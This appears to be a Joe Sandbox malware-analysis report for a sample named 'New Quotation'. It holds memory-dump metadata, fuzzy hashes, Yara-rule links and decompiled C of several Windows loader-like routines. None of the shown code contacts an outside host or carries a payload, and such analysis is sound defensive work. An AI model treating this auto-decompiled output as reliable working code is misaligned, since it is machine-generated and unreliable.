                                                                                                                                                                                          0x1d8394c5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8394d2
                                                                                                                                                                                          0x1d8394e4
                                                                                                                                                                                          0x1d8394d4
                                                                                                                                                                                          0x1d8394dd
                                                                                                                                                                                          0x1d8394dd
                                                                                                                                                                                          0x1d8394ec
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8394f2
                                                                                                                                                                                          0x1d839501
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7edcff
                                                                                                                                                                                          0x1d7edcff
                                                                                                                                                                                          0x1d7edcff
                                                                                                                                                                                          0x1d7edd01
                                                                                                                                                                                          0x1d7edd01
                                                                                                                                                                                          0x1d7edd04
                                                                                                                                                                                          0x1d7edd07
                                                                                                                                                                                          0x1d7edd10
                                                                                                                                                                                          0x1d7edd22
                                                                                                                                                                                          0x1d7edd25
                                                                                                                                                                                          0x1d7edd2c
                                                                                                                                                                                          0x1d7edd33
                                                                                                                                                                                          0x1d7edd3e
                                                                                                                                                                                          0x1d7edd4a
                                                                                                                                                                                          0x1d7edd4a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                          • Opcode ID: 1f36d88a60cfb1874ef11cc2ab18afa4319284a093d72320f644cdbda9a0cc71
                                                                                                                                                                                          • Instruction ID: 089c560a8bd0a5f762df93bf68d8b98191d8fb0a1b088daa679e83c032f6b550
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f36d88a60cfb1874ef11cc2ab18afa4319284a093d72320f644cdbda9a0cc71
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4721E475A08284DFDB128F9CC544BED7BE9FF04794F050096E9049B3A1D7759900D766
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7C6DA6 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 35%
                                                                                                                                                                                          			E1D7C6DA6(intOrPtr __ecx) {
				void* _v12;
				void* _t15;
				intOrPtr _t17;
				void* _t21;
				void* _t25;
				intOrPtr _t27;
				intOrPtr* _t31;
				signed int _t32;
				signed int _t33;

				_t33 = _t32 & 0xfffffff8;
				_push(__ecx);
				_t27 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t21 = 0;
					E1D7DFED0(0x1d8c5220);
					_t24 =  *((intOrPtr*)(_t27 + 0x18));
					if(E1D859174( *((intOrPtr*)(_t27 + 0x18))) != 0) {
						L9:
						_push(0x1d8c5220);
						E1D7DE740(_t24);
						_t15 = _t21;
						L2:
						return _t15;
					}
					_t24 = _t27;
					_t21 = E1D858D4D(_t27, _t25);
					if(_t21 < 0) {
						goto L9;
					}
					_t31 =  *0x1d8c5240; // 0x0
					while(_t31 != 0x1d8c5240) {
						_t17 =  *((intOrPtr*)(_t31 + 0x18));
						_t31 =  *_t31;
						 *((intOrPtr*)(_t33 + 0xc)) = _t17;
						if(_t17 != 0) {
							_t24 = _t17;
							 *0x1d8c91e0( *((intOrPtr*)(_t27 + 0x30)),  *((intOrPtr*)(_t27 + 0x18)),  *((intOrPtr*)(_t27 + 0x20)), _t27);
							 *((intOrPtr*)(_t33 + 0x1c))();
						}
					}
					goto L9;
				}
				_t15 = 0;
				goto L2;
			}












                                                                                                                                                                                          0x1d7c6dab
                                                                                                                                                                                          0x1d7c6dae
                                                                                                                                                                                          0x1d7c6dbf
                                                                                                                                                                                          0x1d7c6dc1
                                                                                                                                                                                          0x1d829be0
                                                                                                                                                                                          0x1d829be2
                                                                                                                                                                                          0x1d829be7
                                                                                                                                                                                          0x1d829bf1
                                                                                                                                                                                          0x1d829c33
                                                                                                                                                                                          0x1d829c33
                                                                                                                                                                                          0x1d829c38
                                                                                                                                                                                          0x1d829c3d
                                                                                                                                                                                          0x1d7c6dc9
                                                                                                                                                                                          0x1d7c6dcf
                                                                                                                                                                                          0x1d7c6dcf
                                                                                                                                                                                          0x1d829bf3
                                                                                                                                                                                          0x1d829bfa
                                                                                                                                                                                          0x1d829bfe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829c00
                                                                                                                                                                                          0x1d829c2b
                                                                                                                                                                                          0x1d829c08
                                                                                                                                                                                          0x1d829c0b
                                                                                                                                                                                          0x1d829c0d
                                                                                                                                                                                          0x1d829c13
                                                                                                                                                                                          0x1d829c19
                                                                                                                                                                                          0x1d829c21
                                                                                                                                                                                          0x1d829c27
                                                                                                                                                                                          0x1d829c27
                                                                                                                                                                                          0x1d829c13
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829c2b
                                                                                                                                                                                          0x1d7c6dc7
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c0a1a3582e7ad10dd50160d6ad2346de9a2326bd67da9da45f1ea1969704ce22
                                                                                                                                                                                          • Instruction ID: 0faaaab6a814ee639da099d8857eb4df2e963754ed3fc066f4fa370101e2e00a
                                                                                                                                                                                          • Opcode Fuzzy Hash: c0a1a3582e7ad10dd50160d6ad2346de9a2326bd67da9da45f1ea1969704ce22
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4401F535648606EFCB016A29DC84AAAB7F9FB84360F850569F54587660DB20FC91C7E2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8589A0 Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                          • Opcode ID: 26e68b332f92243ba0d5a2a771c8c793f196dbfa9d0f470afd90a96fb0104498
                                                                                                                                                                                          • Instruction ID: 1cd0ca19d6637e7ccf4f6d4731fb77e1de86c78be84f38ea0e247dbd31541f75
                                                                                                                                                                                          • Opcode Fuzzy Hash: 26e68b332f92243ba0d5a2a771c8c793f196dbfa9d0f470afd90a96fb0104498
                                                                                                                                                                                          • Instruction Fuzzy Hash: CBF0BB32514354DBD6126A14DC88BEEFBBDFB84760F450497F896171118734BC80C6A3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D808E15 Relevance: 1.5, APIs: 1, Instructions: 27timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                          • Opcode ID: 31931a725143d0e858d56c0c58f08c54b059949bcbeea99d436f0fb4a61fa4f0
                                                                                                                                                                                          • Instruction ID: e0817cf85503fedd08157a5e8ee306c6685939e571456d2b426550a215f2897e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 31931a725143d0e858d56c0c58f08c54b059949bcbeea99d436f0fb4a61fa4f0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BE06831321160DBCF0A6B208E403A93BB07F04E90B4514C9FA0CAB200C31CD882DA42
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D85395B Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E1D85395B(intOrPtr __ecx) {
				signed int _v8;
				char _v1036;
				intOrPtr _v1040;
				intOrPtr _v1044;
				short _v1046;
				char _v1048;
				void* _v1056;
				char _v1060;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t49;
				void* _t57;
				intOrPtr _t59;
				intOrPtr _t65;
				intOrPtr _t83;
				void* _t84;
				signed int _t85;
				signed int _t87;
				signed int _t91;
				void* _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t96;
				signed int _t97;
				void* _t99;
				signed int _t101;
				char _t102;
				signed int _t103;
				signed int _t105;

				_t105 = (_t103 & 0xfffffff8) - 0x424;
				_v8 =  *0x1d8cb370 ^ _t105;
				_t83 = __ecx;
				_v1040 = __ecx;
				if(__ecx == 0 || E1D7F1D10( &_v1048, L"CWDIllegalInDLLSearch") < 0) {
					L31:
					_t87 =  *0x7ffe02d5 & 0x000000ff;
					_v1056 = _t87 >> 0x00000004 & 0x00000003;
					if((_t87 & 0x00000030) == 0x30) {
						_v1056 = _v1056 | 0xffffffff;
					}
					goto L33;
				} else {
					_push( &_v1060);
					_push(0x400);
					_t97 =  &_v1036;
					_push(_t97);
					_push(2);
					_push( &_v1048);
					_push(_t83);
					_t101 = E1D812B00();
					if(_t101 < 0) {
						__eflags = _t101 - 0x80000005;
						if(_t101 != 0x80000005) {
							goto L28;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t102 = _v1060;
							_t91 =  *( *[fs:0x30] + 0x18);
							__eflags = _t91;
							if(_t91 == 0) {
								goto L31;
							}
							_t59 =  *0x1d8c5d78; // 0x0
							_t85 = E1D7E5D90(_t91, _t91, _t59 + 0x180000, _v1060);
							__eflags = _t85;
							if(_t85 == 0) {
								goto L31;
							}
							_t97 = _t85;
							_push( &_v1060);
							_push(_t102);
							_push(_t85);
							_push(2);
							_push( &_v1048);
							_push(_v1040);
							_t101 = E1D812B00();
							__eflags = _t101;
							if(_t101 >= 0) {
								goto L4;
							}
							__eflags = _t101 - 0x80000005;
							if(_t101 != 0x80000005) {
								goto L26;
							} else {
								E1D7E3BC0( *( *[fs:0x30] + 0x18), 0, _t85);
								continue;
							}
						}
						goto L31;
					} else {
						_t85 = 0;
						L4:
						_t65 =  *((intOrPtr*)(_t97 + 4));
						if(_t65 == 3 || _t65 == 7) {
							_push("true");
							_pop(_t92);
							__eflags = _t65 - _t92;
							if(_t65 != _t92) {
								goto L18;
							}
							_v1060 =  *((intOrPtr*)(_t97 + 8));
							__eflags =  *((intOrPtr*)(_t97 + 8)) - _t92;
							if( *((intOrPtr*)(_t97 + 8)) > _t92) {
								_t101 = 0x80000005;
							} else {
								_t35 = _t97 + 0xc; // 0xc
								E1D8188C0( &_v1056, _t35,  *((intOrPtr*)(_t97 + 8)));
								_t105 = _t105 + 0xc;
							}
							goto L26;
						} else {
							_push("true");
							_pop(_t93);
							if(_t65 != _t93) {
								__eflags = _t65 - 0xb;
								if(_t65 == 0xb) {
									L18:
									_t101 = 0xc0000024;
									goto L26;
								}
								__eflags = _t65 - 1;
								if(_t65 == 1) {
									__eflags =  &_v1056 & 0x00000003;
									if(__eflags == 0) {
										_t22 = _t97 + 0xc; // 0xc
										_v1060 = _t93;
										_v1044 = _t22;
										_v1048 =  *((intOrPtr*)(_t97 + 8));
										_v1046 =  *((intOrPtr*)(_t97 + 8));
										_push( &_v1056);
										_push(0);
										_push( &_v1048);
										_t101 = E1D8007D0(_t85, _t97, _t101, __eflags);
									} else {
										_t101 = 0x80000002;
									}
									goto L26;
								}
								goto L18;
							} else {
								if( *((intOrPtr*)(_t97 + 8)) != _t93) {
									_t101 = 0xc0000004;
								} else {
									_v1060 = _t93;
									_v1056 =  *((intOrPtr*)(_t97 + 0xc));
								}
								L26:
								if(_t85 != 0) {
									E1D7E3BC0( *( *[fs:0x30] + 0x18), 0, _t85);
								}
								L28:
								if(_t101 < 0) {
									goto L31;
								}
								_t57 = _v1056;
								if(_t57 < 0xffffffff || _t57 > 2) {
									goto L31;
								} else {
									L33:
									_t49 = _v1056;
									if(_t49 == 0xffffffff) {
										 *0x1d8c68cc =  *0x1d8c68cc | 0xffffffff;
										__eflags =  *0x1d8c68cc;
									} else {
										if(_t49 == 1) {
											 *0x1d8c68cc = 0x2000;
										} else {
											if(_t49 == 2) {
												 *0x1d8c68cc = 0x10;
											} else {
												 *0x1d8c68cc =  *0x1d8c68cc & 0x00000000;
											}
										}
									}
									_pop(_t96);
									_pop(_t99);
									_pop(_t84);
									return E1D814B50(_t49, _t84, _v8 ^ _t105, _t94, _t96, _t99);
								}
							}
						}
					}
				}
			}


































                                                                                                                                                                                          0x1d853963
                                                                                                                                                                                          0x1d853970
                                                                                                                                                                                          0x1d853978
                                                                                                                                                                                          0x1d85397a
                                                                                                                                                                                          0x1d853982
                                                                                                                                                                                          0x1d853b33
                                                                                                                                                                                          0x1d853b33
                                                                                                                                                                                          0x1d853b45
                                                                                                                                                                                          0x1d853b4c
                                                                                                                                                                                          0x1d853b4e
                                                                                                                                                                                          0x1d853b4e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8539a1
                                                                                                                                                                                          0x1d8539a5
                                                                                                                                                                                          0x1d8539a6
                                                                                                                                                                                          0x1d8539ab
                                                                                                                                                                                          0x1d8539b1
                                                                                                                                                                                          0x1d8539b2
                                                                                                                                                                                          0x1d8539b8
                                                                                                                                                                                          0x1d8539b9
                                                                                                                                                                                          0x1d8539bf
                                                                                                                                                                                          0x1d8539c3
                                                                                                                                                                                          0x1d853a00
                                                                                                                                                                                          0x1d853a06
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d853a0c
                                                                                                                                                                                          0x1d853a0c
                                                                                                                                                                                          0x1d853a0c
                                                                                                                                                                                          0x1d853a16
                                                                                                                                                                                          0x1d853a19
                                                                                                                                                                                          0x1d853a1b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d853a21
                                                                                                                                                                                          0x1d853a36
                                                                                                                                                                                          0x1d853a38
                                                                                                                                                                                          0x1d853a3a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d853a44
                                                                                                                                                                                          0x1d853a46
                                                                                                                                                                                          0x1d853a47
                                                                                                                                                                                          0x1d853a48
                                                                                                                                                                                          0x1d853a49
                                                                                                                                                                                          0x1d853a4f
                                                                                                                                                                                          0x1d853a50
                                                                                                                                                                                          0x1d853a59
                                                                                                                                                                                          0x1d853a5b
                                                                                                                                                                                          0x1d853a5d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d853a63
                                                                                                                                                                                          0x1d853a69
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d853a6f
                                                                                                                                                                                          0x1d853a7b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d853a7b
                                                                                                                                                                                          0x1d853a69
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8539c5
                                                                                                                                                                                          0x1d8539c5
                                                                                                                                                                                          0x1d8539c7
                                                                                                                                                                                          0x1d8539c7
                                                                                                                                                                                          0x1d8539cd
                                                                                                                                                                                          0x1d853ade
                                                                                                                                                                                          0x1d853ae0
                                                                                                                                                                                          0x1d853ae1
                                                                                                                                                                                          0x1d853ae3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d853ae8
                                                                                                                                                                                          0x1d853aec
                                                                                                                                                                                          0x1d853aef
                                                                                                                                                                                          0x1d853b07
                                                                                                                                                                                          0x1d853af1
                                                                                                                                                                                          0x1d853af4
                                                                                                                                                                                          0x1d853afd
                                                                                                                                                                                          0x1d853b02
                                                                                                                                                                                          0x1d853b02
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8539dc
                                                                                                                                                                                          0x1d8539dc
                                                                                                                                                                                          0x1d8539de
                                                                                                                                                                                          0x1d8539e1
                                                                                                                                                                                          0x1d853a8c
                                                                                                                                                                                          0x1d853a8f
                                                                                                                                                                                          0x1d853a96
                                                                                                                                                                                          0x1d853a96
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d853a96
                                                                                                                                                                                          0x1d853a91
                                                                                                                                                                                          0x1d853a94
                                                                                                                                                                                          0x1d853aa1
                                                                                                                                                                                          0x1d853aa3
                                                                                                                                                                                          0x1d853aac
                                                                                                                                                                                          0x1d853aaf
                                                                                                                                                                                          0x1d853ab3
                                                                                                                                                                                          0x1d853abb
                                                                                                                                                                                          0x1d853ac4
                                                                                                                                                                                          0x1d853acd
                                                                                                                                                                                          0x1d853ace
                                                                                                                                                                                          0x1d853ad4
                                                                                                                                                                                          0x1d853ada
                                                                                                                                                                                          0x1d853aa5
                                                                                                                                                                                          0x1d853aa5
                                                                                                                                                                                          0x1d853aa5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d853aa3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8539e7
                                                                                                                                                                                          0x1d8539ea
                                                                                                                                                                                          0x1d853a82
                                                                                                                                                                                          0x1d8539f0
                                                                                                                                                                                          0x1d8539f0
                                                                                                                                                                                          0x1d8539f7
                                                                                                                                                                                          0x1d8539f7
                                                                                                                                                                                          0x1d853b0c
                                                                                                                                                                                          0x1d853b0e
                                                                                                                                                                                          0x1d853b1c
                                                                                                                                                                                          0x1d853b1c
                                                                                                                                                                                          0x1d853b21
                                                                                                                                                                                          0x1d853b23
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d853b25
                                                                                                                                                                                          0x1d853b2c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d853b53
                                                                                                                                                                                          0x1d853b53
                                                                                                                                                                                          0x1d853b53
                                                                                                                                                                                          0x1d853b5a
                                                                                                                                                                                          0x1d853b87
                                                                                                                                                                                          0x1d853b87
                                                                                                                                                                                          0x1d853b5c
                                                                                                                                                                                          0x1d853b5f
                                                                                                                                                                                          0x1d853b7b
                                                                                                                                                                                          0x1d853b61
                                                                                                                                                                                          0x1d853b64
                                                                                                                                                                                          0x1d853b6f
                                                                                                                                                                                          0x1d853b66
                                                                                                                                                                                          0x1d853b66
                                                                                                                                                                                          0x1d853b66
                                                                                                                                                                                          0x1d853b64
                                                                                                                                                                                          0x1d853b5f
                                                                                                                                                                                          0x1d853b95
                                                                                                                                                                                          0x1d853b96
                                                                                                                                                                                          0x1d853b97
                                                                                                                                                                                          0x1d853ba2
                                                                                                                                                                                          0x1d853ba2
                                                                                                                                                                                          0x1d853b2c
                                                                                                                                                                                          0x1d8539e1
                                                                                                                                                                                          0x1d8539cd
                                                                                                                                                                                          0x1d8539c3

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: CWDIllegalInDLLSearch
                                                                                                                                                                                          • API String ID: 0-473384322
                                                                                                                                                                                          • Opcode ID: fe922dccbf1d225bde7b82123f93c2cbfb7be5c1dfa4c190dd5fa3744f090e87
                                                                                                                                                                                          • Instruction ID: f6c53b50d09c920cc46c9ac4ff730be360fdea53a0cfa7be58a5bb8e78ed5701
                                                                                                                                                                                          • Opcode Fuzzy Hash: fe922dccbf1d225bde7b82123f93c2cbfb7be5c1dfa4c190dd5fa3744f090e87
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3751E3769087569FDB11CE58C881B6AB7E8FB44724F024A29F965EB290D330E944CB93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CCD8A Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                          			E1D7CCD8A(intOrPtr __ecx, void* __edx, void* __eflags) {
				unsigned int _v8;
				char _v12;
				char _v16;
				unsigned int _v20;
				unsigned int _v24;
				intOrPtr _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				signed int _t45;
				unsigned int _t49;
				signed int _t50;
				signed int _t56;
				void* _t57;
				intOrPtr _t60;
				intOrPtr _t62;
				signed int _t64;
				signed int _t67;
				unsigned int _t68;
				signed int _t70;
				intOrPtr _t72;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				signed int _t78;
				void* _t82;
				intOrPtr _t85;
				signed int _t86;
				void* _t87;
				signed int _t88;

				_t86 = 0;
				_v12 = 7;
				_v24 = 0;
				_t62 = __ecx;
				_v20 = 0;
				_t87 = __edx;
				_v28 = __ecx;
				_v8 = 0;
				_v16 = 0;
				E1D815050(__ecx,  &_v36, L"AlternateCodePage");
				_push(__ecx);
				_t42 = E1D7CD64A(_t87,  &_v36,  &_v12, 0,  &_v8);
				if(_t42 != 0xc0000034) {
					_t67 = _v8;
					__eflags = _t67;
					if(_t67 == 0) {
						goto L1;
					}
					__eflags = _t42 - 0x80000005;
					if(_t42 != 0x80000005) {
						goto L1;
					}
					_t68 = _t67 + 2;
					_v8 = _t68;
					_t70 = _t68 + 0x00000003 & 0xfffffffc;
					__eflags = _t70;
					if(_t70 != 0) {
						_t42 = E1D7E5D90(_t70,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t70);
						_t86 = _t42;
					}
					__eflags = _t86;
					if(_t86 == 0) {
						goto L1;
					}
					_push(_t70);
					_t45 = E1D7CD64A(_t87,  &_v36,  &_v12, _t86,  &_v8);
					__eflags = _t45;
					if(_t45 != 0) {
						L22:
						return E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t86);
					}
					__eflags = _v12 - 1;
					if(_v12 == 1) {
						L10:
						_t88 = _t86;
						_t49 = _v8 >> 1;
						__eflags = _t49;
						_t72 = 0;
						_v8 = _t49;
						_v12 = _t72;
						if(_t49 == 0) {
							goto L22;
						}
						_t64 = _t62 + 0x14;
						__eflags = _t64;
						while(1) {
							__eflags = _t88;
							if(_t88 == 0) {
								goto L22;
							}
							__eflags =  *_t88 - _t72;
							if( *_t88 == _t72) {
								goto L22;
							}
							_t50 = E1D8179A0(_t88, "*");
							_pop(_t74);
							__eflags = _t50;
							if(_t50 == 0) {
								_t75 = _t74 | 0xffffffff;
								__eflags = _t75;
								 *(_v28 + 0x14) = _t75;
								goto L22;
							}
							E1D815050(_t74,  &_v36, _t88);
							_push( &_v16);
							_push(0xa);
							_push( &_v36);
							_t56 = E1D8007D0(_t64, _t86, _t88, __eflags);
							__eflags = _t56;
							if(_t56 != 0) {
								L17:
								_t76 = _t88;
								_t28 = _t76 + 2; // 0x2
								_t82 = _t28;
								do {
									_t57 =  *_t76;
									_t76 = _t76 + 2;
									__eflags = _t57 - _v24;
								} while (_t57 != _v24);
								_t78 = _t76 - _t82 >> 1;
								_t85 = _v12 + 1 + _t78;
								_v12 = _t85;
								_t88 = _t88 + _t78 * 2 + 2;
								_t72 = 0;
								__eflags = _t85 - _v8;
								if(_t85 < _v8) {
									continue;
								}
								goto L22;
							}
							 *_t64 = _v16;
							_t64 = _t64 + 2;
							_t60 = _v20 + 1;
							_v20 = _t60;
							__eflags = _t60 - 4;
							if(_t60 >= 4) {
								goto L22;
							}
							goto L17;
						}
						goto L22;
					}
					__eflags = _v12 - 7;
					if(_v12 != 7) {
						goto L22;
					}
					goto L10;
				}
				L1:
				return _t42;
			}




































                                                                                                                                                                                          0x1d7ccd95
                                                                                                                                                                                          0x1d7ccd97
                                                                                                                                                                                          0x1d7ccda6
                                                                                                                                                                                          0x1d7ccda9
                                                                                                                                                                                          0x1d7ccdab
                                                                                                                                                                                          0x1d7ccdaf
                                                                                                                                                                                          0x1d7ccdb1
                                                                                                                                                                                          0x1d7ccdb4
                                                                                                                                                                                          0x1d7ccdb7
                                                                                                                                                                                          0x1d7ccdba
                                                                                                                                                                                          0x1d7ccdbf
                                                                                                                                                                                          0x1d7ccdce
                                                                                                                                                                                          0x1d7ccdd8
                                                                                                                                                                                          0x1d82a275
                                                                                                                                                                                          0x1d82a278
                                                                                                                                                                                          0x1d82a27a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a280
                                                                                                                                                                                          0x1d82a285
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a28b
                                                                                                                                                                                          0x1d82a28e
                                                                                                                                                                                          0x1d82a294
                                                                                                                                                                                          0x1d82a294
                                                                                                                                                                                          0x1d82a297
                                                                                                                                                                                          0x1d82a2a5
                                                                                                                                                                                          0x1d82a2aa
                                                                                                                                                                                          0x1d82a2aa
                                                                                                                                                                                          0x1d82a2ac
                                                                                                                                                                                          0x1d82a2ae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a2b4
                                                                                                                                                                                          0x1d82a2c3
                                                                                                                                                                                          0x1d82a2c8
                                                                                                                                                                                          0x1d82a2ca
                                                                                                                                                                                          0x1d82a382
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a38f
                                                                                                                                                                                          0x1d82a2d0
                                                                                                                                                                                          0x1d82a2d4
                                                                                                                                                                                          0x1d82a2e0
                                                                                                                                                                                          0x1d82a2e3
                                                                                                                                                                                          0x1d82a2e7
                                                                                                                                                                                          0x1d82a2e7
                                                                                                                                                                                          0x1d82a2e9
                                                                                                                                                                                          0x1d82a2ea
                                                                                                                                                                                          0x1d82a2ed
                                                                                                                                                                                          0x1d82a2f0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a2f6
                                                                                                                                                                                          0x1d82a2f6
                                                                                                                                                                                          0x1d82a2f9
                                                                                                                                                                                          0x1d82a2f9
                                                                                                                                                                                          0x1d82a2fb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a301
                                                                                                                                                                                          0x1d82a304
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a30c
                                                                                                                                                                                          0x1d82a312
                                                                                                                                                                                          0x1d82a313
                                                                                                                                                                                          0x1d82a315
                                                                                                                                                                                          0x1d82a37b
                                                                                                                                                                                          0x1d82a37b
                                                                                                                                                                                          0x1d82a37e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82a37e
                                                                                                                                                                                          0x1d82a31c
                                                                                                                                                                                          0x1d82a324
